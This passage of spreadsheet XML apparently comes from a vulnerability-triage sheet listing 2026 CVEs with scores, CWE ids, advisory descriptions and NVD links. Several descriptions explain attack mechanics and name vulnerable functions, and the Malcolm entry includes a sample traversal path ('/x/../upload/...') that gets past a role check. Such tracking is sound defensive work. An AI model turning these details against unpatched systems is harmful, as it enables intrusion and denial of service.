arbitrary system accounts. This issue is fixed in version 4.14.7.</t>
        </is>
      </c>
      <c r="M1204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54085</t>
        </is>
      </c>
    </row>
    <row r="1205">
      <c r="A1205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55520</t>
        </is>
      </c>
      <c r="C1205" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1205" s="5" t="inlineStr"/>
      <c r="F1205" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1205" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1205" s="5" t="inlineStr"/>
      <c r="I1205" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1205" s="5" t="inlineStr"/>
      <c r="K1205" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L1205" s="5" t="inlineStr">
        <is>
          <t>Protego is a pure-Python robots.txt parser with support for modern conventions. Prior to 0.6.2, protego._urlpattern._URLPattern._prepare_pattern_for_regex translates every asterisk in an Allow or Disallow directive into a lazy regular-expression wildcard, so a directive containing many asterisks creates exponential backtracking. After protego.Protego.parse processes a crafted robots.txt file, protego.Protego.can_fetch can spend an attacker-controlled period matching a near-miss URL and deny service to the crawler. The vulnerable path is src/protego/_urlpattern.py in the _URLPattern match logic. This issue is fixed in version 0.6.2.</t>
        </is>
      </c>
      <c r="M1205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55520</t>
        </is>
      </c>
    </row>
    <row r="1206">
      <c r="A1206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55673</t>
        </is>
      </c>
      <c r="C1206" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1206" s="5" t="inlineStr"/>
      <c r="F1206" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1206" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1206" s="5" t="inlineStr"/>
      <c r="I1206" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1206" s="5" t="inlineStr"/>
      <c r="K1206" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="L1206" s="5" t="inlineStr">
        <is>
          <t>PowSyBl (Power System Blocks) is a framework to build power system oriented software. Prior to 7.2.2, UnixLocalCommandExecutor and WindowsLocalCommandExecutor concatenate command arguments and environment variables into strings interpreted through bash -c or cmd /c without sufficient escaping. Attacker-controlled values reaching UnixLocalCommandExecutor.execute, WindowsLocalCommandExecutor.execute, LocalComputationManager.execute, ParallelLoadFlowActionSimulator.run, ActionSimulatorTool.run, AmplModelRunner.run, or AmplModelRunner.runAsync can break out of the intended command and execute arbitrary shell commands as the JVM user. The affected itools paths include action-simulator with task-count, security-analysis with external, and dynamic-security-analysis. Downstream CLI tools, libraries, REST front ends, and multi-tenant grid-analysis services that forward less-trusted contingency identifiers or computation parameters into these APIs can expose the injection remotely. This issue is fixed in version 7.2.2.</t>
        </is>
      </c>
      <c r="M1206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55673</t>
        </is>
      </c>
    </row>
    <row r="1207">
      <c r="A1207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62680</t>
        </is>
      </c>
      <c r="C1207" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1207" s="5" t="inlineStr"/>
      <c r="F1207" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1207" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1207" s="5" t="inlineStr"/>
      <c r="I1207" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1207" s="5" t="inlineStr"/>
      <c r="K1207" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-829, CWE-918</t>
        </is>
      </c>
      <c r="L1207" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.22.0, Orval resolves remote and local external $ref values without an allowlist or confinement to the input directory. Processing an attacker-controlled OpenAPI description can cause requests from the developer or CI host to attacker-selected or internal HTTP services, read absolute or out-of-tree local files, and inline untrusted remote schemas into generated clients. The affected code is packages/orval/src/import-specs.ts external reference loading. This issue is fixed in version 8.22.0.</t>
        </is>
      </c>
      <c r="M1207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62680</t>
        </is>
      </c>
    </row>
    <row r="1208">
      <c r="A1208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63177</t>
        </is>
      </c>
      <c r="C1208" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1208" s="5" t="inlineStr"/>
      <c r="F1208" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1208" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H1208" s="5" t="inlineStr"/>
      <c r="I1208" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1208" s="5" t="inlineStr"/>
      <c r="K1208" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1208" s="5" t="inlineStr">
        <is>
          <t>Malcolm is a network traffic analysis tool suite. Prior to version 26.07.0, role-based access control enforced in the Nginx OpenResty Lua layer evaluates the raw, unnormalized `ngx.var.request_uri`, while Nginx itself routes requests using the normalized path. An authenticated low-privilege user can prepend a traversal segment (for example `/x/../upload/...`) so that Nginx routes the request to a restricted backend while the Lua role check fails to match any rule and falls open, granting access it should deny. Version 26.07.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M1208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63177</t>
        </is>
      </c>
    </row>
    <row r="1209">
      <c r="A1209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64379</t>
        </is>
      </c>
      <c r="C1209" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1209" s="5" t="inlineStr"/>
      <c r="F1209" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1209" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1209" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1209" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J1209" s="5" t="inlineStr"/>
      <c r="K1209" s="5" t="inlineStr"/>
      <c r="L1209" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: mask server-provided mode to 07777 in modefromsid
When modefromsid is active, parse_dacl() applies the server-provided
sub_auth[2] value from the NFS mode SID to cf_mode without masking to
07777. Apply the correct masking, same as in the read path.</t>
        </is>
      </c>
      <c r="M1209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64379</t>
        </is>
      </c>
    </row>
    <row r="1210">
      <c r="A1210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64816</t>
        </is>
      </c>
      <c r="C1210" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1210" s="5" t="inlineStr"/>
      <c r="F1210" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1210" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1210" s="5" t="inlineStr"/>
      <c r="I1210" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1210" s="5" t="inlineStr"/>
      <c r="K1210" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1210" s="5" t="inlineStr">
        <is>
          <t>RapidRAW before 1.6.0 does not validate the lutPath field in preset files before passing it to File::open() in lut_processing.rs. On Windows, a UNC path in lutPath causes an outbound SMB connection to an attacker-controlled host, leaking the victim's NTLMv2 credentials. The vulnerable code path is reachable through two vectors: community presets fetched automatically from the remote preset repository when the victim opens the Community tab, and individual preset files imported directly by the victim via the preset import feature (handle_import_presets_from_file in file_management.rs). The second vector does not require control of the community preset repository and is triggered when a user imports a preset file shared through Discord, forums, or similar channels.</t>
        </is>
      </c>
      <c r="M1210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64816</t>
        </is>
      </c>
    </row>
    <row r="1211">
      <c r="A1211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66003</t>
        </is>
      </c>
      <c r="C1211" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1211" s="5" t="inlineStr"/>
      <c r="F1211" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1211" s="5" t="inlineStr">
        <is>
          <t>java, python</t>
        </is>
      </c>
      <c r="H1211" s="5" t="inlineStr"/>
      <c r="I1211" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1211" s="5" t="inlineStr"/>
      <c r="K1211" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1211" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework written in Python and JavaScript. Prior to version 15.115.0, an access control bypass in the REST API allows a user to read data from Linked DocTypes that they are not authorized to access. When a document references another document through a Link field, the framework does not consistently enforce the linked DocType's own permissions when the record is retrieved through the REST API, so a low-privileged authenticated user can obtain fields from linked records outside their permitted scope. This issue is fixed in version 15.115.0.</t>
        </is>
      </c>
      <c r="M1211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66003</t>
        </is>
      </c>
    </row>
    <row r="1212">
      <c r="A1212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68553</t>
        </is>
      </c>
      <c r="C1212" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1212" s="5" t="inlineStr"/>
      <c r="F1212" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1212" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H1212" s="5" t="inlineStr"/>
      <c r="I1212" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1212" s="5" t="inlineStr"/>
      <c r="K1212" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="L1212" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.13.0, an authenticated TURN user can place printf-style format specifiers in the STUN USERNAME or REALM attribute, which passes is_secure_string() validation and is embedded into Redis keys at nine call sites in src/apps/relay/ns_ioalib_engine_impl.c. send_message_to_redis() in src/apps/relay/hiredis_libevent2.c then passes the attacker-controlled key as the format argument to redisAsyncCommand() while supplying only one variadic value, causing hiredis redisvFormatCommand() to read past the va_list. Exploitation can crash the coturn process and terminate active TURN sessions or disclose stack memory into Redis. This issue is fixed in version 4.13.0.</t>
        </is>
      </c>
      <c r="M1212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68553</t>
        </is>
      </c>
    </row>
    <row r="1213">
      <c r="A1213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68835</t>
        </is>
      </c>
      <c r="C1213" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1213" s="5" t="inlineStr"/>
      <c r="F1213" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1213" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1213" s="5" t="inlineStr"/>
      <c r="I1213" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1213" s="5" t="inlineStr"/>
      <c r="K1213" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1213" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68835</t>
        </is>
      </c>
    </row>
    <row r="1214">
      <c r="A1214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68846</t>
        </is>
      </c>
      <c r="C1214" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1214" s="5" t="inlineStr"/>
      <c r="F1214" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1214" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1214" s="5" t="inlineStr"/>
      <c r="I1214" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1214" s="5" t="inlineStr"/>
      <c r="K1214" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1214" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t>
        </is>
      </c>
    </row>
    <row r="1215">
      <c r="A1215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68889</t>
        </is>
      </c>
      <c r="C1215" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1215" s="5" t="inlineStr"/>
      <c r="F1215" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1215" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1215" s="5" t="inlineStr"/>
      <c r="I1215" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1215" s="5" t="inlineStr"/>
      <c r="K1215" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L1215" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t>
        </is>
      </c>
    </row>
    <row r="1216">
      <c r="A1216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68893</t>
        </is>
      </c>
      <c r="C1216" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1216" s="5" t="inlineStr"/>
      <c r="F1216" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1216" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1216" s="5" t="inlineStr"/>
      <c r="I1216" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1216" s="5" t="inlineStr"/>
      <c r="K1216" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1216" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t>
        </is>
      </c>
    </row>
    <row r="1217">
      <c r="A1217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69244</t>
        </is>
      </c>
      <c r="C1217" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1217" s="5" t="inlineStr"/>
      <c r="F1217" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1217" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1217" s="5" t="inlineStr"/>
      <c r="I1217" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1217" s="5" t="inlineStr"/>
      <c r="K1217" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-400, CWE-416</t>
        </is>
      </c>
      <c r="L1217" s="5" t="inlineStr">
        <is>
          <t>AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to 3.14.3, an out-of-bounds heap read could occur in the C response parser while building an error message for a malformed response. An attacker controlled server, or possibly an accidental response, could trigger a DoS in the client. The vulnerable path was error message construction in aiohttp/_http_parser.pyx, where an llhttp error-position pointer was used to build a snippet for malformed chunked responses and malformed request or response bytes at the buffer end. This issue is fixed in version 3.14.3.</t>
        </is>
      </c>
      <c r="M1217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69244</t>
        </is>
      </c>
    </row>
    <row r="1218">
      <c r="A1218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69272</t>
        </is>
      </c>
      <c r="C1218" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1218" s="5" t="inlineStr"/>
      <c r="F1218" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1218" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1218" s="5" t="inlineStr"/>
      <c r="I1218" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1218" s="5" t="inlineStr"/>
      <c r="K1218" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1218" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69272</t>
        </is>
      </c>
    </row>
    <row r="1219">
      <c r="A1219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69274</t>
        </is>
      </c>
      <c r="C1219" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1219" s="5" t="inlineStr"/>
      <c r="F1219" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1219" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1219" s="5" t="inlineStr"/>
      <c r="I1219" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1219" s="5" t="inlineStr"/>
      <c r="K1219" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1219" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69274</t>
        </is>
      </c>
    </row>
    <row r="1220">
      <c r="A1220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69296</t>
        </is>
      </c>
      <c r="C1220" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1220" s="5" t="inlineStr"/>
      <c r="F1220" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1220" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1220" s="5" t="inlineStr"/>
      <c r="I1220" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1220" s="5" t="inlineStr"/>
      <c r="K1220" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1220" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t>
        </is>
      </c>
    </row>
    <row r="1221">
      <c r="A1221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69305</t>
        </is>
      </c>
      <c r="C1221" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1221" s="5" t="inlineStr"/>
      <c r="F1221" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1221" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1221" s="5" t="inlineStr"/>
      <c r="I1221" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1221" s="5" t="inlineStr"/>
      <c r="K1221" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1221" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69305</t>
        </is>
      </c>
    </row>
    <row r="1222">
      <c r="A1222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69313</t>
        </is>
      </c>
      <c r="C1222" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1222" s="5" t="inlineStr"/>
      <c r="F1222" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1222" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1222" s="5" t="inlineStr"/>
      <c r="I1222" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1222" s="5" t="inlineStr"/>
      <c r="K1222" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1222" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t>
        </is>
      </c>
    </row>
    <row r="1223">
      <c r="A1223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69314</t>
        </is>
      </c>
      <c r="C1223" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1223" s="5" t="inlineStr"/>
      <c r="F1223" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1223" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1223" s="5" t="inlineStr"/>
      <c r="I1223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1223" s="5" t="inlineStr"/>
      <c r="K1223" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1223" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69314</t>
        </is>
      </c>
    </row>
    <row r="1224">
      <c r="A1224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69336</t>
        </is>
      </c>
      <c r="C1224" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1224" s="5" t="inlineStr"/>
      <c r="F1224" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1224" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1224" s="5" t="inlineStr"/>
      <c r="I1224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1224" s="5" t="inlineStr"/>
      <c r="K1224" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1224" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69336</t>
        </is>
      </c>
    </row>
    <row r="1225">
      <c r="A1225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69337</t>
        </is>
      </c>
      <c r="C1225" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1225" s="5" t="inlineStr"/>
      <c r="F1225" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1225" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1225" s="5" t="inlineStr"/>
      <c r="I1225" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1225" s="5" t="inlineStr"/>
      <c r="K1225" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1225" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Registry allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69337</t>
        </is>
      </c>
    </row>
    <row r="1226">
      <c r="A1226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69340</t>
        </is>
      </c>
      <c r="C1226" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1226" s="5" t="inlineStr"/>
      <c r="F1226" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1226" s="5" t="inlineStr">
        <is>
          <t>windows</t>
